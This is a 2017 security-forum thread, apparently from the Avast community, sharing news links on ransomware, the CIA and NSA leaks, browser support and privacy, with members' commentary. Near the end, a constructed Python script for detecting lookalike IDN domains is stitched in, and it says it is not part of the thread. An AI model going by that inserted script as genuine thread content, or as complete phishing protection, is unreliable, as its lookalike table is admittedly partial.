The question is why Avast! and AVG are still separate and not one product; it would be 25+% then.
This has been explained, by Vlk I believe. Going to a single product very quickly would be likely to upset both sets of users.
-
Every so often we have to look here: http://downdetector.com/
Just recently for the M$ outage
(Redmond never commented; all we have now coming as an explanation
is only on a need-to-know basis).
polonus
-
new CIA wikileaks reveal(s) in progress https://wikileaks.org/ciav7p1/
-
Firefox is ending support for Windows XP and Vista (https://support.mozilla.org/t5/Install-and-Update/Important-Firefox-is-ending-support-for-Windows-XP-and-Vista/ta-p/31270)
In March 2017, if you are using Firefox with Windows XP or Windows Vista, you will automatically be updated to the Extended Support Release version of Firefox. more...
-
Firefox is ending support for Windows XP and Vista (https://support.mozilla.org/t5/Install-and-Update/Important-Firefox-is-ending-support-for-Windows-XP-and-Vista/ta-p/31270)
In March 2017, if you are using Firefox with Windows XP or Windows Vista, you will automatically be updated to the Extended Support Release version of Firefox. more...
Yes, my Firefox version on XP is just about to update to the ESR version.
-
CIA hacking tools: Should we be worried?
http://www.bbc.com/news/technology-39205405
-
Don’t Use Your Antivirus’ Browser Extensions: They Can Actually Make You Less Safe
https://www.howtogeek.com/239950/dont-use-your-antivirus-browser-extensions-they-can-actually-make-you-less-safe/
-
Firefox is ending support for Windows XP and Vista (https://support.mozilla.org/t5/Install-and-Update/Important-Firefox-is-ending-support-for-Windows-XP-and-Vista/ta-p/31270)
Unlike the usual case, where pressing "update" makes it download and install the new version, this time it doesn't actually update to v52 ESR; it just restarts the browser and then shows this notice that you're on the "esr" channel, but it's still v51. (Similar to DavidR's screen clipping above.)
This is despite the quote (http://support.mozilla.org/t5/Install-and-Update/Important-Firefox-is-ending-support-for-Windows-XP-and-Vista/ta-p/31270) from the article:
Firefox version 52 will be the last complete update for Windows XP and Windows Vista. Security updates will be released, but no new features.
-
After another restart mine did eventually show the Firefox ESR on the About Firefox screen.
-
After another restart mine did eventually show the Firefox ESR on the About Firefox screen.
Same here - it took several tries.
-
Spammers expose their entire operation through bad backups
http://www.csoonline.com/article/3176433/security/spammers-expose-their-entire-operation-through-bad-backups.html
-
New RanRan Ransomware Uses Encryption Tiers, Political Messages
https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/
-
New Cerber Ransomware Variant Released That Keeps Original Filename
https://www.bleepingcomputer.com/news/security/new-cerber-ransomware-variant-released-that-keeps-original-filename/
Good news is that AVG detects it as JS/Downloader.Agent.71_P. Hope Avast also does the same. After all, avast and AVG are one company. :D
VirusTotal: https://www.virustotal.com/en/file/2e264025227b06e1f4e04c833e37ef887680186c5642827ddbe4ef09a3a44b05/analysis/
-
New RanRan Ransomware Uses Encryption Tiers, Political Messages
https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/
Palo Alto says they already created two decrypters (https://github.com/pan-unit42/public_tools/tree/master/ranran_decryption) to recover data for victims of this new threat.
-
TorrentLocker Changes Attack Method, Targets Leading European Countries
http://blog.trendmicro.com/trendlabs-security-intelligence/torrentlocker-changes-attack-method-targets-leading-european-countries/
-
Credit Card Stealer Disguises as Google Chrome Browser
https://www.bleepingcomputer.com/news/security/credit-card-stealer-disguises-as-google-chrome-browser/
-
Only approx. a quarter of all websites made using PHP are known to be secure.
Time to check websites' PHP code is secure:
http://learnwebtutorials.com/things-check-to-make-sure-php-code-is-secure
link credits go to the article authors.
PHP can be inherently insecure in the hands of first year and inexperienced coders that do not know what security measures to take.
Open to script injection vulnerabilities, cross site scripting, XSS threats etc. Also requests may not guarantee what you get back in return. So without the right security in place there is room to get extra worried. Also consider the threats being added by script and plug-in code that has not been checked.
polonus
-
Number of new malware variants reaches highest level since October 2016
https://www.symantec.com/connect/blogs/latest-intelligence-february-2017
-
Apple, Google, And The CIA
https://labsblog.f-secure.com/2017/03/09/apple-google-and-the-cia/
F-Secure FAQ Related To CIA WikiLeaks Docs
https://labsblog.f-secure.com/2017/03/09/faq-related-to-cia-wikileaks-docs/
-
Number of new malware variants reaches highest level since October 2016
https://www.symantec.com/connect/blogs/latest-intelligence-february-2017
This doesn't really surprise me, I would expect it to be an ever increasing number, but it looks like the malware writers go on holiday too ;)
-
CryptoBlock ransomware and its C2
https://blog.malwarebytes.com/threat-analysis/2017/03/cryptoblock-and-its-c2/
-
When a webhosting nameserver exposes its name server software version to the world and hackers, like
9.9.4-RedHat-9.9.4-29.el7_2.4 -> http://www.dnsinspect.com/mijndnsserver.nl/10048179
you should not be too surprised that with a political conflict at hand websites you host are gonna be defaced.
As always now website security is a last resort issue!
polonus
-
PetrWrap Ransomware Is a Petya Offspring Used in Targeted Attacks
https://www.bleepingcomputer.com/news/security/petrwrap-ransomware-is-a-petya-offspring-used-in-targeted-attacks/
-
Embittered Enjey Ransomware Developer Launches DDoS Attack on ID Ransomware
https://www.bleepingcomputer.com/news/security/embittered-enjey-ransomware-developer-launches-ddos-attack-on-id-ransomware/
-
Present-day WWW looks as fragile as a sand-castle
Exploitable javascript code libraries all over the place.
Inherently holed and insecure infrastructure.
And it won't be any better for the foreseeable future.
Read: https://www.theregister.co.uk/2017/03/14/outdated_javascript_libraries_weaken_web_security/
Some here, including little old me, are hammering the subject endlessly but almost in vain,
as almost not a soul seems interested in doing something about it.
Hey baby, baby, it is a wild wild wild world out there on most of these insecure online websites!
Interesting survey results for those interested in website development and security: https://stackoverflow.com/insights/survey/2016
polonus (volunteer website security analyst and website error-hunter)
-
New Imeij IoT Malware Targets AVTech Equipment
https://www.bleepingcomputer.com/news/security/new-imeij-iot-malware-targets-avtech-equipment/
-
AV the fine balance between protecting your private data and being a concern or threat to your privacy?
Read: https://www.theregister.co.uk/2017/03/17/security_software_is_a_threat_to_your_privacy_too/
polonus
-
Star Trek Themed Kirk Ransomware Brings us Monero and a Spock Decryptor!
https://www.bleepingcomputer.com/news/security/star-trek-themed-kirk-ransomware-brings-us-monero-and-a-spock-decryptor/
-
All Firefox users should read here; it was hacked at Pwn2Own the other day, see: https://forum.avast.com/index.php?topic=199002.msg1378499#msg1378499 and here: http://forums.mozillazine.org/viewtopic.php?f=38&t=2888507
to see the problems with run of the mill browsers go on and on in an endless stream.
Thanks to -midnight for a very early heads-up ;)
polonus
-
All Firefox users should read here; it was hacked at Pwn2Own the other day, see: https://forum.avast.com/index.php?topic=199002.msg1378499#msg1378499 and here: http://forums.mozillazine.org/viewtopic.php?f=38&t=2888507
to see the problems with run of the mill browsers go on and on in an endless stream.
<snip>
Not sure if your 2nd link is valid/current, given it was posted November 14th, 2014, 12:11 pm. All browsers are constantly under attack; the more market share, the more of a target they will be.
-
@DavidR,
The second link was to show how that same issue now via an integer overflow was used (revived in another context) in the most recent Pwn2Own hack.
So insecurity is like music being played from a Dutch grinding organ. They use the same blocks (flaws) over and over again to play their favourite tunes and melodies.
Here a golden oldie from 2014 was revived. This is because digital infrastructure is insecure by design. So we have started out with an "a priori" unsafe aka insecure model and have built further onto that.
What has been INsecure from the word go, can never be secure(d) again or it has to be re-built up again from scratch and no one will or can (afford to) do that. We have to live in that world now. Do not trust a thing, and look for a bug everywhere around you, disclosed or not.
polonus
-
@DavidR,
The second link was to show how that same issue now via an integer overflow was used (revived in another context) in the most recent Pwn2Own hack.
<snip>
polonus
The same can be said of all browsers, and if you want Microsoft Windows, we are still getting security updates for the same sort of issues time and again, Permission Escalation, etc., going back through all of the Windows OS releases purporting to be the most secure yet.
-
Big Surprise: Chinese PUPs Deliver Backdoored Drivers
https://www.bleepingcomputer.com/news/security/big-surprise-chinese-pups-deliver-backdoored-drivers/
-
Big Surprise: Chinese PUPs Deliver Backdoored Drivers
https://www.bleepingcomputer.com/news/security/big-surprise-chinese-pups-deliver-backdoored-drivers/
"For recent Windows 10 versions, the driver won't load past build 14393 or version 1607."
Another reason to update to the latest version of Windows 10.
-
Vast increase of hacked websites seen: https://webmasters.googleblog.com/2017/03/nohacked-year-in-review.html
This is unfortunate news and it means that the likes of Eddy, others and little old me will have to report many more malicious, suspicious and insecure websites in the coming future in the "virus and worms section" of these here forums.
If only people would only update & patch, better secure & use best practices, better configure & better retire what is unsafe, we would not be in that awfully insecure infrastructure situation we have now.
Alas the situation gets worse and worse and as far as I can see no better times in sight.
polonus (volunteer website security analyst and website error-hunter)
-
New LLTP Ransomware Appears to be a Rewritten Venus Locker
https://www.bleepingcomputer.com/news/security/new-lltp-ransomware-appears-to-be-a-rewritten-venus-locker/
-
vBulletin Hack Exposes 820,000 Accounts from 126 Forums
http://news.softpedia.com/news/vbulletin-hack-exposes-820-000-accounts-from-126-forums-513416.shtml
-
GoDaddy acquires Sucuri. Often the claims that websites were fully secured seemed not quite appropriate.
Whether Sucuri will offer similar services in the future, like they did in the past, remains to be seen.
polonus
-
GoDaddy acquires Sucuri. Often the claims that websites were fully secured seemed not quite appropriate.
Whether Sucuri will offer similar services in the future, like they did in the past, remains to be seen.
polonus
More here: https://blog.sucuri.net/2017/03/godaddy-sucuri-building-a-security-platform-for-every-website-owner.html
-
Google Chrome to Distrust Symantec SSLs for Mis-issuing 30,000 EV Certificates
http://thehackernews.com/2017/03/google-invalidate-symantec-certs.html
-
Google Chrome to Distrust Symantec SSLs for Mis-issuing 30,000 EV Certificates
http://thehackernews.com/2017/03/google-invalidate-symantec-certs.html
Good for Avast :) They might get a few more customers. :)
-
Man-in-the-Middle strategies, either by AV or Google for that matter, are never advancing security. And root certificates as such are "bad practice", period.
As Google rules the market with Google Analytics and Adsense on almost all and every website, they now may have planned this well in advance to have a gigantic advantage. Bye bye Let's Encrypt etc. Now we may see why they started the HTTPS Everywhere strategy.
Their schemes may enhance CA security as a rule, but it also certainly will pay off for them grand scale.
Microsoft was also continuously not following protocol guidelines, just bending the rules everywhere to what suited their policies and monopolistic schemes best.
polonus
-
Do not use it for the time being, LastPass, they keep finding holes in it!
I wonder if it ever was really secure: https://twitter.com/taviso/status/844312124541186048
and https://blog.lastpass.com/2017/03/security-update-for-the-lastpass-extension.html/
Use a piece of paper and some terrible handwriting???????
polonus
-
Or use an enigma machine
-
Cerber Starts Evading Machine Learning
http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/
-
Cerber Starts Evading Machine Learning
http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/
FYI guys, I had already discussed the Dropbox abuse with some of the avast analysts a month ago and they came up with a solution.
Dropbox links like this are detected by avast as JS:RansomDownloader-B[Trj]. Even if avast doesn't see it on VirusTotal, we actually are being protected; I can assure that since I have seen such links this week that were missed on VT, whereas when I tried downloading it, avast was stopping it.
This is old news actually :slowpokes: probably another PR nonsense for an attack that is almost a month old.
Still an interesting read, as essentially the JS download from Dropbox is a downloader that downloads a binary. So if you detect the dropped binary it's game over, and there is where machine learning comes in.
-
Still an interesting read as this is quite misleading... essentially the JS download from Dropbox is a downloader that downloads a binary. So if you detect the dropped binary it's game over, and there is where machine learning comes in.
That is explained there
This is old news actually :slowpokes: probably another PR nonsense for an attack that is almost a month old.
If so then all AV vendors do it
And someone needs to take the time to analyse and write this; that is not done the same day as they see a thing like this ;)
-
Hi Pondus,
And they 'play'/run the same old working exploits with little variants on the main theme over and over again.
Just like putting a wooden block into a grinding organ and you get the tune you want.
They do not have to write that stack over and over again, just adjust it....
polonus
-
The infection isn't exactly bypassing the machine learning. Of course the downloader part is just an addition to the infection chain, but I think AVs will detect the downloaded binaries in some way; at least avast does.
Let me know your thoughts.
Best,
TI
-
The infection isn't exactly bypassing the machine learning. Of course the downloader part is just an addition to the infection chain, but I think AVs will detect the downloaded binaries in some way; at least avast does.
Let me know your thoughts.
Best,
TI
Machine Learning and Evasion
As a threat, Cerber has already been blocked by earlier advances in security solutions. Running Cerber in a normal process (as done by the loader) can help evade behavioral monitoring, but why go to the trouble of repackaging Cerber and using a separate loader? Earlier versions of Cerber already had a code injection routine which could mimic that particular behavior, so why was the separate loader necessary?
The answer lies in the security industry's adoption of machine learning solutions. The industry has created features to proactively detect malicious files based on features instead of signatures. The new packaging and loading mechanism employed by Cerber can cause problems for static machine learning approaches, i.e., methods that analyze a file without any execution or emulation.
Self-extracting files and simple, straightforward files could pose a problem for static machine learning file detection. All self-extracting files may look similar by structure, regardless of the content. Unpacked binaries with limited features may not look malicious either. In other words, the way Cerber is packaged could be said to be designed to evade machine learning file detection. For every new malware detection technique, an equivalent evasion technique is created out of necessity.
This new evasion technique does not defeat an anti-malware approach that uses multiple layers of protection. Cerber has its weaknesses against other techniques. For instance, having an unpacked .DLL file will make it easy to create a one-to-many pattern; alternately having a set structure within an archive will make it easier to identify if a package is suspicious. Solutions that rely on a variety of techniques, and are not overly reliant on machine learning, can still protect customers against these threats.
-
That is what I said they don't exactly bypass the machine learning so the title of the blog post is kind of misleading and self contradictory. You are right with the highlighted statements of course :)
-
That is what I said they don't exactly bypass the machine learning so the title of the blog post is kind of misleading and self contradictory. You are right with the highlighted statements of course :)
It could be (meaning) it is dependent on AV product?
-
It could be (meaning) it is dependent on AV product?
Of course yes.... in this case not avast (at least this time) thanks to the improvements on the back end and their lab.
Most AV's are not traditional anymore.
Antivirus is Evolving and will be Evolving forever. :)
-
PyCL Ransomware Delivered via RIG EK in Distribution Test By Lawrence Abrams
https://www.bleepingcomputer.com/news/security/pycl-ransomware-delivered-via-rig-ek-in-distribution-test/
-
Zero-day hole in Microsoft IIS 6.0 (no longer being supported) actively attacked:
http://blog.trendmicro.com/trendlabs-security-intelligence/iis-6-0-vulnerability-leads-code-execution
Re: the hole is found in WebDAV: https://nl.wikipedia.org/wiki/Webdav
Newer versions of the server software are not vulnerable.
polonus
-
Broadband rules axed by Congress, headed to Trump
http://www.usatoday.com/story/tech/news/2017/03/28/broadband-rules-axed-congress-headed-trump/99744078/
Please, no political statements.
-
Please, no political statements.
D'oh! :-X that is a tuff one ;D
-
Please, no political statements.
D'oh! :-X that is a tuff one ;D
Very tough when the article is political ;)
-
Please, no political statements.
D'oh! :-X that is a tuff one ;D
Very tough when the article is political ;)
Especially when the bill is still a holdover from Obama. :)
-
From now on, we'll all be using a VPN. for now, that'll work.
I rely on the one from Avast. If that's not an option,
Get Opera and activate the VPN service in settings > Security & Privacy. :)
-
Hi bob3160,
And what will that mean for the Privacy Shield agreement with the EU,
or will the "old continent" comply to this with not much further ado,
and agree to the new situation, so that all of your data online may be sold to the highest bidder.
If there ever was an end to privacy, then now that moment has arrived.
What you said all along, bob3160, that "Privacy does not exist any longer"
seems to have been prophetic words here.
Damian
-
Hi bob3160,
And what will that mean for the Privacy Shield agreement with the EU,
or will the "old continent" comply to this with not much further ado,
and agree to the new situation, so that all of your data online may be sold to the highest bidder.
If there ever was an end to privacy, then now that moment has arrived.
What you said all along, bob3160, that "Privacy does not exist any longer"
seems to have been prophetic words here.
Damian
Something else to read:
http://lifehacker.com/why-is-everyone-talking-about-vpns-1793768312?utm_source=lifehacker_newsletter&utm_medium=email&utm_campaign=2017-03-29
-
Dear bob3160,
Just watch this: https://www.youtube.com/watch?v=qAT_ina93NY
Very topical now....
Damian
-
Dear bob3160,
Just watch this: https://www.youtube.com/watch?v=qAT_ina93NY
Very topical now....
Damian
Now if you realize that this video is 3 years old, imagine just how much more
of your privacy has been lost for ever.
I've preached for years that there is no such thing as personal privacy. Maybe this video and,
the current proposed legislation, makes that statement hit home.
-
Verizon is going to install spyware onto your Android-device:
https://www.verizon.com/about/privacy/appflash-privacy-policy
Why this is bad, read:
https://www.eff.org/deeplinks/2017/03/first-horseman-privacy-apocalypse-has-already-arrived-verizon-announces-plans
More generally on Data-Jacking: http://www.darkreading.com/the-era-of-data-jacking-is-here-are-you-ready-/a/d-id/1328173
polonus
-
Adware vs. ad fraud
https://blog.malwarebytes.com/cybercrime/2017/03/adware-vs-ad-fraud/?utm_source=double-opt-in&utm_medium=email-internal-b2c&utm_campaign=EM-B2C-2017-March-newsletter-issue2&utm_content=adware-vs-adfraud
-
Less secure bootstrap in the CloudFlare/GoDaddy clouds!
Issues with bootstrap
Found with SRI-hash issues in Stylesheets: https://sritest.io/#report/144f10cc-d705-4ef7-b513-46edbfa469d1
CloudFlare GoDaddy abuse - The getbootstrap.com server is vulnerable to:
Heartbleed also has problems with TLS:
Common name:
-sni49733.cloudflaressl.com Comodo certificate chain ECC Domain Validated Secure Server & -sni49733.cloudflaressl certificate
SAN:
Re: http://toolbar.netcraft.com/site_report?url=http%3A%2F%2Fgetbootstrap.com
See: https://urlscan.io/result/bb7dec19-4186-4864-b722-ac2989f663fb#summary
F-F-X status: https://observatory.mozilla.org/analyze.html?host=getbootstrap.com
MISSING MANDATORY CIPHERS for TLS: https://www.htbridge.com/ssl/?id=11fdf72a57bff6ed97fd176c0f1c23985b6a10e99247c7b70b52025f396e05ca
and other misconfigurations and weaknesses (mixed content and https redirect)
Seems from this report that the American infrastructure does not have that secure e2e encryption we are being led to believe,
this is endangering the average users that make use of such services.
polonus (volunteer website security analyst and website error-hunter)
-
Marble, a very dangerous CIA malware obfuscation/deobfuscation tool.
Through Marble the CIA could insert obfuscated text and deobfuscate it later to mask the origins of malware.
The tool could be used for instance to blame the Russians for something and then later take off the evidence and then in return blame the Chinese, or whatever the spooks had in store for us all.
This dangerous malware tool made everyone's infrastructure less secure to protect the interests of less than 1% of the global population.
Being a linguist myself I wonder whether analytical analysis of the inserted texts could show up inconsistencies in the language inserted, so it can be shown where the malware manipulation was being performed (Langley Virginia, Frankfurt Germany Europe).
Comparative linguistics looking for misspellings, wrong use of grammar rules. In Poland we say proverbially: "Lies have short legs".
Are we as online users being protected against such "cloak and dagger" schemes or does AV have to refrain from analysing further
under existing "gag orders", we will never come to know.
Read comments: https://news.ycombinator.com/item?id=14006059
-
A nice file viewer, very helpful in the analysis of potentially suspicious or malicious websites, has come under fire from the DMCA
2017/04/01 08:15:08 Note: One of those DMCA actions has been filed against this scanner, an issue about one of the javascript algos I use. Now my hosting service is telling me with a DMCA the URL, i.e. this scanner, has to be taken down until the DMCA is resolved. The whole DMCA thing is a bunch of legalese (which I don't begin to understand) so I (my hosting service) will be taking the scanner down while I seek legal assistance. Thank you for your patience while I try to resolve.
Haven't they got better things to do than keeping us all more insecure ::)
The global Internet security infrastructure apparently has come under attack from the "forces that be", in particular Big Monetizers.
Hopefully this is an April First Joke. ;)
polonus
-
Too late to change our minds about LastPass:
A fundamental bug that will make many stop using LastPass. One could change to Dashlane. The only relevant closed-source pwmanagers now are 1Password and Dashlane. The only free one that stays is KeePass. All 3 such pwmanagers have another underlying mechanism than LastPass. But remember what Ormandy remarked on KeePass earlier:
(In chronological order)
https://twitter.com/taviso/status/758122674316906496
https://twitter.com/taviso/status/763801055725359104
https://twitter.com/taviso/status/769581755502166017
https://twitter.com/taviso/status/817065731703468032
https://twitter.com/taviso/status/843242496448577536
White hat hackers remain a threat to every password manager!
pol
-
Hi Pol, Avast Passwords is also free. ;)
-
RoboForm 8.x is also free for single user computer use
-
Maker of smart garage door opener bricks customer’s device in retaliation for negative review
https://www.extremetech.com/internet/247127-maker-iot-garage-door-opener-bricks-customers-device-retaliation-negative-review
-
BrickerBot may ruin your ill-protected IoT-device:
Read: https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/
You may check your security here: https://iotscanner.bullguard.com/deep-scan-completed
pol
-
Maker of smart garage door opener bricks customer’s device in retaliation for negative review
https://www.extremetech.com/internet/247127-maker-iot-garage-door-opener-bricks-customers-device-retaliation-negative-review
Tsk Tsk. Another reason to use the old muscle routine to get things done.
-
Maker of smart garage door opener bricks customer’s device in retaliation for negative review
https://www.extremetech.com/internet/247127-maker-iot-garage-door-opener-bricks-customers-device-retaliation-negative-review
Tsk Tsk. Another reason to use the old muscle routine to get things done.
There really are times when I think reinventing the wheel isn't the way to go when the existing solution is working without adding risk.
Let's say you don't have a garage door opener. The first part of the equation is getting a motor powerful enough to raise the door or replace the door. The people that supply those doors are highly likely to provide the remote key fob device to open it.
So who needs more tech to do something that can already be done, making something that already does the job redundant. Or even more, depriving the car owner of a little exercise.
-
Shun it, Ask dot com bleed: https://twitter.com/hanno/status/850283638667317248
pol
-
Dridex Campaigns Hitting Millions of Recipients Using Unpatched Microsoft Zero-Day
https://www.proofpoint.com/us/threat-insight/post/dridex-campaigns-millions-recipients-unpatched-microsoft-zero-day
-
Let's Encrypt and Comodo Certificates abused for PHISHING.
Read: https://news.netcraft.com/archives/2017/04/12/lets-encrypt-and-comodo-issue-thousands-of-certificates-for-phishing.html
polonus
P.S. This news is not completely neutral as Netcraft is also in the EV-Certificate business, so this news might not be completely without bias.
D.
-
Mole Ransomware Distributed Through Fake online Word Docs
Unfortunately, at this time there is no way to currently decrypt files encrypted by Mole for free.
https://www.bleepingcomputer.com/news/security/mole-ransomware-distributed-through-fake-online-word-docs/
-
https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer
-
Magento Zero Day 200.000 webshops at risk :o
Re: http://blog.defensecode.com/2017/04/high-risk-0-day-vulnerability-found-in.html
Check your local Magento community for affected sites, example: https://www.dutchento.org/showcases/
polonus
-
https://theintercept.com/2017/04/14/leaked-nsa-malware-threatens-windows-users-around-the-world/
NSA's exploit tools are out in the open. Leaked by the Shadow Brokers hacker group.
-
https://theintercept.com/2017/04/14/leaked-nsa-malware-threatens-windows-users-around-the-world/
NSA's exploit tools are out in the open. Leaked by the Shadow Brokers hacker group.
What if NSA have leaked this on purpose, that would be a neat trick
And they now log info from lots of bad guys / goverments .... hmmm 8)
-
This is essentially a big archive of exploits and dirty programs. ODDJOB, ZIPPYBEER, and ESTEEMAUDIT, capable of breaking into — and in some cases seizing control of — computers running versions of the Windows operating system.
FUZZBUNCH is the crown jewel here; it is used by NSA to deploy any exploit in their arsenal. Here is a screenshot of the exploits from FUZZBUNCH that can be used.
-
Hi True Indian,
NSA is trying to turn the tables on the Internet, turning it into a panopticon of sorts.
Even tor source developers are being asked to cooperate just so to allow NSA to get access to meta-data and mail-content
(recently for example with German tor-developer, Hahn).
There will always be some Judas, that will sell his internet soul for a "proverbial thirty silverlings", just to follow the Easter Story.
NSA divides users in two categories. Those users that can be brought easily under mass surveillance without further ado. They fall victim to normal dragnet procedures.
And a second category of users that know how to protect themselves and their privacy. This latter category will directly come under scrutiny by such services (users that use Tor and Tails for instance or visit here: https://www.resetthenet.org/ ).
Protection for that second category of end-users will become harder and harder (recently with plans to use one and the same browser engine for all major browsers (Edge, Firefox and Google's Chrome) and so a mono-culture of extension APIs for them all). It is a pity not all Internet users are aware of this insecure status "by design" of the Internet as we have it now. From an information exchange medium it was slowly turned into a 'grab more of that money' machine.
The average user just thinks, when it all functions, it is OK. Then in a lot of cases he, she or it may be completely wrong.
polonus
-
According to Microsoft most of these NSA exploits were being patched: https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/
Four exploits were not being patched until one month ago.
For users of Windows XP, Server 2003 and Vista this is a completely different story; they run risks even with EnglishmanDentist, EsteemAudit and ExplodingCan and all other unpatched exploits.
Remember that running surveillance exploits against the general public has been an ongoing practice since 2001.
Targeted attacks cannot even be evaluated (watering place attacks etc.).
polonus
-
It's a mystery as to how MS patched these vulnerabilities a month ago before this was even leaked. ???
-
Not really a mystery if it was leaked to them first. :)
-
Not really a mystery if it was leaked to them first. :)
MS has not given any statement on the above yet or they just don't want to!
There are no acknowledgements for MS17-10 which patched most of the big bugs from the ShadowBrokers drop.
According to Mr. Snowden, he doesn't believe that this is all NSA has and he says there are more unknown exploits like these that NSA never bothers to reveal but instead uses to spy.
-
Oracle patches Solaris 10 hole exploited by NSA spyware tool – and 298 other security bugs
http://www.theregister.co.uk/2017/04/19/oracle_april_security_patches_nsa/
-
That apple.com link you clicked on? Yeah, it's actually Russian
http://www.theregister.co.uk/2017/04/18/homograph_attack_again/
-
'Nobody's got to use the internet,' argues idiot congressman in row over ISP privacy rules
https://www.theregister.co.uk/2017/04/17/sensenbrenner_blunder_after_privacy_criticism/
-
120.000 Drupal websites exploitable by a hole in a module with left-behind code: https://www.drupal.org/project/usage/references
Drupal is now seen waiting for a new maintainer: 2017-04-14 - A potential new maintainer is working through the process of fixing the References module. When this is complete a new release will be published and this SA will be updated.
Unsupported modules are not the way to go forward, guys :o
polonus
-
100.000 servers infested with 'leaked' NSA government malware: http://blog.binaryedge.io/2017/04/21/doublepulsar/
Especially where older Windows servers are being used globally, these risks have not been mitigated (Windows 2006 server for instance) and the NSA exploit holes haven't been patched. In the Netherlands 1300 servers showed to have been affected.
Normally NSA should remove the malware and all traces of it, but sometimes the spooks get sloppy and do not abide by their own stringent rules. So eventually their schemes are detected and some can take counter-measures.
Good for law-abiding citizens that should be left alone.
polonus
-
Related to Chrome / Opera / Firefox
Phishing with Unicode Domains >> https://www.xudongz.com/blog/2017/idn-phishing/
IDN in Google Chrome >> https://www.chromium.org/developers/design-documents/idn-in-google-chrome
IDN homograph attack > https://en.wikipedia.org/wiki/IDN_homograph_attack
Punycode > https://en.wikipedia.org/wiki/Punycode
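As an added example (not code from this thread or from the linked articles), here is a small Python check in the spirit of the IDN policy documents above: it decodes Punycode ("xn--") labels and flags both mixed-script labels and whole-script lookalikes such as the Cyrillic "apple.com". The confusable table, script list and sample hostnames are constructed for the example and are deliberately incomplete.

```python
"""Flag IDN homograph (lookalike) hostnames before they reach a user.

Added example: decodes xn-- labels with Python's idna codec, then applies two
checks modelled on the browser policies linked above:
 1. mixed-script labels (Latin letters with a Cyrillic letter swapped in);
 2. whole-script confusables: a label written entirely in another script whose
    letters all render like ASCII letters (Cyrillic "аррӏе" vs "apple").
"""
import unicodedata

# Constructed lookalike table (a small subset of Unicode's confusables data):
# non-Latin letters that render like ASCII letters -> the ASCII letter imitated.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u04cf": "l", "\u0456": "i", "\u0458": "j",
    "\u0455": "s", "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v",
}

# Script families recognised by script_of(); anything else counts as COMMON.
SCRIPTS = ("LATIN", "CYRILLIC", "GREEK", "ARMENIAN", "HEBREW", "ARABIC")


def to_unicode(hostname: str) -> str:
    """Decode any xn-- (Punycode) labels; a hostname already in Unicode passes through."""
    try:
        return hostname.encode("ascii").decode("idna")
    except UnicodeError:
        # Non-ASCII input, or an xn-- label that is not valid IDNA: inspect as given.
        return hostname


def script_of(ch: str) -> str:
    """Script family of one character ('COMMON' for digits, hyphen and the like)."""
    name = unicodedata.name(ch, "")
    for script in SCRIPTS:
        if name.startswith(script + " "):
            return script
    return "COMMON"


def assess_label(label: str) -> dict:
    """Run both homograph checks on a single, already decoded label."""
    scripts = {script_of(ch) for ch in label} - {"COMMON"}
    # Replace every known lookalike by the ASCII letter it imitates.
    skeleton = "".join(CONFUSABLES.get(ch, ch) for ch in label)
    return {
        "label": label,
        "skeleton": skeleton,
        "mixed_script": len(scripts) > 1,
        # Not ASCII itself, yet every character has an ASCII lookalike:
        # the label renders like `skeleton` in a browser address bar.
        "lookalike": (not label.isascii()) and skeleton.isascii(),
    }


def assess_hostname(hostname: str) -> dict:
    """Decode and inspect every label; 'suspicious' is what a proxy or mail filter would alert on."""
    hostname = hostname.strip().rstrip(".").lower()
    decoded = to_unicode(hostname)
    labels = [assess_label(part) for part in decoded.split(".") if part]
    return {
        "input": hostname,
        "decoded": decoded,
        "is_punycode": any(part.startswith("xn--") for part in hostname.split(".")),
        "skeleton": ".".join(part["skeleton"] for part in labels),
        "suspicious": any(part["mixed_script"] or part["lookalike"] for part in labels),
        "labels": labels,
    }


if __name__ == "__main__":
    # Constructed inputs: the Cyrillic apple.com demo domain from the linked IDN
    # write-up, a mixed-script lookalike, a legitimate German IDN and plain ASCII.
    for host in ("xn--80ak6aa92e.com", "p\u0430ypal.com", "m\u00fcnchen.de", "apple.com"):
        r = assess_hostname(host)
        print(f"{host:20} -> {r['decoded']:12} looks like {r['skeleton']:12} suspicious={r['suspicious']}")
```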
-
Homeland Security warns of 'BrickerBot' malware that destroys unsecured internet-connected devices
http://www.zdnet.com/article/homeland-security-warns-of-brickerbot-malware-that-destroys-unsecured-internet-connected-devices/
-
No more IP addresses for countries that shut down internet access
https://www.theregister.co.uk/2017/04/12/no_ip_addresses_for_countries/
-
Voice and face impersonation on the horizon, a brave new future we do not desire?
Re: https://www.theregister.co.uk/2017/04/24/voice_stealing_lyrebird/
pol
-
Voice and face impersonation on the horizon, a brave new future we do not desire?
Re: https://www.theregister.co.uk/2017/04/24/voice_stealing_lyrebird/
pol
Yea, human counterpart is to cold-call a victim and ask "Can you hear me?" and use the affirmative (recorded) answer to spoof your bank accounts and the like. Not kosher at all.
[EDIT:] Ahem, oops.
-
Pawn Storm: The Power of Social Engineering
http://blog.trendmicro.com/pawn-storm-power-social-engineering/
Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks
http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks/
A Storm’s a Coming: How businesses can defend against threat actor groups like Pawn Storm
http://blog.trendmicro.com/storms-coming-businesses-can-defend-threat-actor-groups-like-pawn-storm/
-
Those complaining about avast FP, it does happen to others also
AV provider Webroot melts down as update nukes hundreds of legit files
https://arstechnica.com/security/2017/04/av-provider-webroot-melts-down-as-update-nukes-hundreds-of-legit-files/
https://community.webroot.com/t5/Announcements/W32-Trojan-Gen-False-Positive-Fix-April-24/td-p/290198
-
Those complaining about avast FP, it does happen to others also
AV provider Webroot melts down as update nukes hundreds of legit files
https://arstechnica.com/security/2017/04/av-provider-webroot-melts-down-as-update-nukes-hundreds-of-legit-files/
